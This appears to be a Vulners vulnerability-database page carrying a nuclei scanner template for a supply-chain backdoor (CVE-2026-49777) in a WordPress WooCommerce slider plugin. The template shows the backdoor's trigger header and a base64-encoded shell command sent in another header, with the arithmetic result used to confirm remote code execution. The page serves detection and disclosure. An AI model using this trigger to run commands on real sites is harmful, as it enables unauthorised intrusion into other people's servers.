Lucene search
K

WordPress Product Slider Pro for WooCommerce < 3.5.4 - Supply Chain Backdoor RCE

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Critical supply chain backdoor RCE in WordPress Product Slider Pro for WooCommerce prior to 3.5.4.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-10735
21 Jun 202617:46
githubexploit
GithubExploit
Exploit for CVE-2026-49777
12 Jun 202608:26
githubexploit
ATTACKERKB
CVE-2026-49777
5 Jun 202608:59
attackerkb
Circl
CVE-2026-49777
5 Jun 202610:00
circl
CNNVD
WordPress plugin Product Slider Pro for WooCommerce 安全漏洞
5 Jun 202600:00
cnnvd
CVE
CVE-2026-49777
5 Jun 202608:59
cve
Cvelist
CVE-2026-49777 WordPress Product Slider Pro for WooCommerce plugin < 3.5.4 - Backdoor vulnerability
5 Jun 202608:59
cvelist
EUVD
EUVD-2026-34792
5 Jun 202608:59
euvd
NVD
CVE-2026-49777
5 Jun 202609:16
nvd
Patchstack
WordPress Product Slider Pro for WooCommerce plugin < 3.5.4 - Backdoor vulnerability
4 Jun 202609:42
patchstack
Rows per page
id: CVE-2026-49777

info:
  name: WordPress Product Slider Pro for WooCommerce < 3.5.4 - Supply Chain Backdoor RCE
  author: DhiyaneshDk
  severity: critical
  description: |
    Improper Validation of Specified Quantity in Input vulnerability in ShapedPlugin, LLC Product Slider Pro for WooCommerce allows Malicious Software Implanted. This issue affects Product Slider Pro for WooCommerce: from n/a before 3.5.4.
  impact: |
    Attackers can implant malicious software, potentially compromising the system or data integrity.
  remediation: |
    Apply the vendor's patch or update to the latest fixed version when available.
  reference:
    - https://patchstack.com/database/wordpress/plugin/woo-product-slider-pro/vulnerability/wordpress-product-slider-pro-for-woocommerce-plugin-3-5-2-backdoor-vulnerability
    - https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-49777
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2026-49777
    epss-score: 0.01656
    epss-percentile: 0.73743
    cwe-id: CWE-506
  metadata:
    verified: true
    max-request: 1
    vendor: shapedplugin
    product: product_slider_pro_for_woocommerce
    framework: wordpress
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/woo-product-slider-pro"
  tags: cve,cve2026,wordpress,wp-plugin,backdoor,rce,supply-chain,woocommerce,unauth,shapedplugin,vkev

variables:
  a: "{{rand_int(10000, 99999)}}"
  b: "{{rand_int(10000, 99999)}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Cache-Status: nw9xQmK4
        X-Cache-Key: {{base64("expr " + a + " + " + b)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{to_number(a)+to_number(b)}}"

      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(content_type, 'text/plain')"
        condition: and

    extractors:
      - type: dsl
        dsl:
          - "body"
# digest: 4b0a00483046022100a954091273ba47a1dc2b59329503e1af31ee349d773fedb2b7a1a71c0d6fb66d022100bd2dace69fc249da00e3afe64f27c2dae5dbaca77ed6af93c9b0164857fff913:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jun 2026 06:22Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.110
EPSS0.01656
SSVC
17